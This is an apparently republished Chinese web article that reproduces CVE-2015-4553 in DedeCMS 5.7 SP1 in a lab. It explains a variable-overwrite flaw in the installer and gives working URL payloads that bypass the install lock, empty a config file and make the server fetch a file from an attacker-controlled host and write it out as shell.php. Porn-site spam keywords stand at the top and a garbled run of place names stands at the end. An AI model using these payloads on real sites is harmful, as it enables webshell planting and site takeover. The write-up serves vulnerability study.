最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

DedeCMS 5.7 sp1遠(yuǎn)程文件包含漏洞(CVE-2015-4553)

 更新時(shí)間:2019年08月14日 14:03:29   作者:雨中落葉  
這篇文章主要介紹了DedeCMS 5.7 sp1遠(yuǎn)程文件包含漏洞(CVE-2015-4553)的相關(guān)知識(shí),本文圖文并茂給大家介紹的非常詳細(xì),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下

一、漏洞描述

該漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符號(hào)使用不當(dāng),導(dǎo)致變量覆蓋,以至于最后引起遠(yuǎn)程文件包含漏洞。

二、漏洞影響版本

DeDeCMS < 5.7-sp1,包括5.7 sp1版本

三、漏洞環(huán)境搭建

1、下載DeDeCMS V5.7 SP1,然后放到phpstudy環(huán)境下的www目錄下,然后瀏覽器訪http://192.168.10.171/dedecms/uploads/install/index.php

  

2、點(diǎn)擊我已閱讀并繼續(xù)。然后是環(huán)境檢測(cè),保存默認(rèn)即可

  

3、接下來(lái)是參數(shù)配置,需要設(shè)置的只有數(shù)據(jù)庫(kù)密碼,把自己的密碼填上去就行了

  

4、然后就把環(huán)境搭好了

  

四、漏洞復(fù)現(xiàn)

1、查看/install/index.php源碼,發(fā)現(xiàn)存在變量覆蓋漏洞,該代碼的意思是將get,post或者cookie方式傳入的值通過(guò)foreach以鍵值對(duì)的方式輸出,例如在url中輸入?str=hello,則$_k的值就是str,$_v的值就是hello,所以${$_k}就是$str, 后面的RunMagicQuotes函數(shù)在另一個(gè)文件中定義的,大致就是對(duì)參數(shù)進(jìn)行過(guò)濾然后返回參數(shù)內(nèi)容。

  

  

2、嘗試通過(guò)變量覆蓋重裝網(wǎng)站,瀏覽器訪問(wèn)

  

3、變量覆蓋后,直接進(jìn)入安裝界面,但是由于安裝鎖的存在不能繼續(xù)重新安裝,除非刪除安裝鎖http://192.168.10.171/dedecms/uploads/install/index.php?insLockfile=1

  

4、只有變量覆蓋暫時(shí)還不夠,繼續(xù)瀏覽代碼,發(fā)現(xiàn)最后幾行代碼

  

4.1、這段代碼首先包含了/data/admin/config_update.php文件, 這里定義了變量updateHost

文件內(nèi)容如下:

  

4.2、繼續(xù)看373-387行代碼,$updateHost與dedecms/demodata.{$a_lang}.txt拼接為字符串,并利用files_get_contents函數(shù)讀取demodata.{$s_lang}.txt文件內(nèi)容,最后將該文件內(nèi)容寫入到$install_demo_name參數(shù)中。

4.3、因此我們可以結(jié)合上面的變量覆蓋漏洞來(lái)進(jìn)行遠(yuǎn)程文件包含,直接寫webshell。

5、由于$updateHost變量是引入進(jìn)來(lái)的,所以不能直接進(jìn)行覆蓋,需要先將config_update.php文件清空再包含。

5.1、這時(shí)候可以利用fopen函數(shù)來(lái)實(shí)現(xiàn),可以看到fopen中的參數(shù)是w,會(huì)直接重寫文件,而file_get_contents讀取文件失敗會(huì)返回NULL

  

5.2、然后利用fwrite函數(shù),這里可以利用變量覆蓋,將$s_lang隨意取名成不存在的文件名, $install_demo_name指向”../data/admin/config_update.php”,為了程序能夠執(zhí)行到這里,需要將$step設(shè)置為11,這樣就達(dá)到了清空config_update.php的目的。

構(gòu)造payload: http://192.168.10.171/dedecms/uploads/install/index.php?

step=11&s_lang=test&install_demo_name=…/data/admin/config_update.php

瀏覽器訪問(wèn),提示如下

  

5.3、查看代碼,發(fā)現(xiàn)這里有一個(gè)判斷文件是否存在(也就是判斷網(wǎng)站是否安裝)的條件,通過(guò)變量覆蓋漏洞將$insLockfile構(gòu)造成任意不存在的文件就可以繞過(guò)這個(gè)條件的限制

  

5.4、再次構(gòu)造payload:

http://192.168.10.171/dedecms/uploads/install/index.php?step=11&s_lang=test&insLockfile=test&install_demo_name=../data/admin/config_update.php

  

5.5、此時(shí)可以看到config_update.php會(huì)發(fā)現(xiàn)已經(jīng)變?yōu)?kb,空文件

  

5.6、config_update.php文件內(nèi)容被清空之后,這時(shí)我們就可以控制updateHost參數(shù)了,這時(shí)我們就可以開(kāi)始遠(yuǎn)程文件包含上傳我們想要上傳的文件了

5.7、在kali上創(chuàng)建一個(gè)dedecms文件夾,然后創(chuàng)建一個(gè)demodata.gb2312.txt,寫入<?php phpinfo();?> ,然后開(kāi)啟web服務(wù)

  

5.8、再次構(gòu)造payload, install_demo_name改為要上傳的路徑,updateHost改為遠(yuǎn)程目標(biāo)機(jī)的IP

Payload如下:

http://192.168.10.171/dedecms/uploads/install/index.php?step=11&insLockfile=test&install_demo_name=../shell.php&updateHost=http://192.168.10.140/

瀏覽器訪問(wèn),出現(xiàn)界面說(shuō)明寫入成功

  

5.9、查看是否上傳成功,確定上傳成功

  

6、瀏覽器訪問(wèn)上傳的shell.php

  

總結(jié)

以上所述是小編給大家介紹的DedeCMS 5.7 sp1遠(yuǎn)程文件包含漏洞(CVE-2015-4553),希望對(duì)大家有所幫助,如果大家有任何疑問(wèn)請(qǐng)給我留言,小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對(duì)腳本之家網(wǎng)站的支持!
如果你覺(jué)得本文對(duì)你有幫助,歡迎轉(zhuǎn)載,煩請(qǐng)注明出處,謝謝!

相關(guān)文章

  • matlab畫三維圖像的示例代碼(附demo)

    matlab畫三維圖像的示例代碼(附demo)

    這篇文章主要介紹了matlab畫三維圖像的示例代碼(附demo),文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2019-12-12
  • Deepseek使用指南與提問(wèn)優(yōu)化策略方式

    Deepseek使用指南與提問(wèn)優(yōu)化策略方式

    本文介紹了DeepSeek語(yǔ)義搜索引擎的核心功能、集成方法及優(yōu)化提問(wèn)策略,通過(guò)自然語(yǔ)言處理和機(jī)器學(xué)習(xí)提供精準(zhǔn)搜索結(jié)果,適用于智能客服、知識(shí)庫(kù)檢索等領(lǐng)域
    2025-02-02
  • 網(wǎng)址(URL)支持的最大長(zhǎng)度是多少?最大支持多少個(gè)字符?

    網(wǎng)址(URL)支持的最大長(zhǎng)度是多少?最大支持多少個(gè)字符?

    這篇文章主要介紹了網(wǎng)址(URL)支持的最大長(zhǎng)度是多少?最大支持多少個(gè)字符?本文總結(jié)了IIS、apache服務(wù)器及瀏覽器軟件Internet Explorer、Firefox、Opera、chrome等主流的瀏覽器軟件支持情況,需要的朋友可以參考下
    2015-07-07
  • Iris 環(huán)境搭建詳細(xì)教程(最新版Go&IDEA&IrisV12)

    Iris 環(huán)境搭建詳細(xì)教程(最新版Go&IDEA&IrisV12)

    這篇文章主要介紹了Iris 環(huán)境搭建(最新版Go&IDEA&IrisV12),本文通過(guò)示例圖文相結(jié)合給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2021-11-11
  • Jenkins部署war包和部署jar包的詳細(xì)步驟

    Jenkins部署war包和部署jar包的詳細(xì)步驟

    這篇文章主要介紹了Jenkins部署war包和部署jar包的詳細(xì)步驟,本恩分步驟通過(guò)圖文并茂的形式給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2020-10-10
  • Git基礎(chǔ)之git與SVN版本控制優(yōu)缺點(diǎn)區(qū)別分析

    Git基礎(chǔ)之git與SVN版本控制優(yōu)缺點(diǎn)區(qū)別分析

    這篇文章主要為大家介紹了Git基礎(chǔ)之git與SVN優(yōu)缺點(diǎn)及區(qū)別分析,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2022-04-04
  • DeepSeek-R1本地部署的極簡(jiǎn)教程

    DeepSeek-R1本地部署的極簡(jiǎn)教程

    最近,deepseek ai發(fā)布了一個(gè)超強(qiáng)開(kāi)源版本的大模型,效果接近于Chat GPT o1-mini,并且提供了支持本地部署的版本,本教程旨在讓讀者學(xué)會(huì)本地部署,感興趣的小伙伴跟著小編一起來(lái)看看吧
    2025-03-03
  • ollama搭建本地ai大模型并應(yīng)用調(diào)用的操作方法

    ollama搭建本地ai大模型并應(yīng)用調(diào)用的操作方法

    這篇文章詳細(xì)介紹了如何下載、安裝和使用OLLAMA大模型,包括啟動(dòng)配置模型、配置UI界面、搭建本地知識(shí)庫(kù)、配置文件開(kāi)發(fā)、環(huán)境變量配置以及通過(guò)Golang實(shí)現(xiàn)接口調(diào)用的示例
    2024-11-11
  • 一個(gè)假冒的序列號(hào)被用來(lái)注冊(cè)Internet?Download?Manager,IDM正在退出的解決辦法

    一個(gè)假冒的序列號(hào)被用來(lái)注冊(cè)Internet?Download?Manager,IDM正在退出的解決辦法

    這篇文章主要介紹了一個(gè)假冒的序列號(hào)被用來(lái)注冊(cè)Internet?Download?Manager?IDM正在退出的解決辦法,在文章末尾給大家分享了序列號(hào)和綠色軟件,大家根據(jù)自身情況選擇,需要的朋友可以參考下
    2023-01-01
  • chatGPT?deBug解決管理員登入服務(wù)器返回401問(wèn)題

    chatGPT?deBug解決管理員登入服務(wù)器返回401問(wèn)題

    這篇文章主要介紹了chatGPT?deBug解決管理員登入,服務(wù)器返回401,沒(méi)有拿到數(shù)據(jù),有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2023-05-05

最新評(píng)論

永吉县| 贵溪市| 宜昌市| 中卫市| 丹江口市| 林西县| 齐河县| 丹巴县| 吴堡县| 南漳县| 太湖县| 梅河口市| 崇义县| 寿宁县| 富阳市| 沙田区| 会昌县| 上饶市| 邓州市| 隆子县| 睢宁县| 荣成市| 教育| 拉孜县| 红安县| 怀化市| 城市| 榕江县| 韶关市| 吉林省| 昌都县| 穆棱市| 桂林市| 开原市| 南溪县| 定日县| 南宫市| 惠安县| 巫山县| 广东省| 申扎县|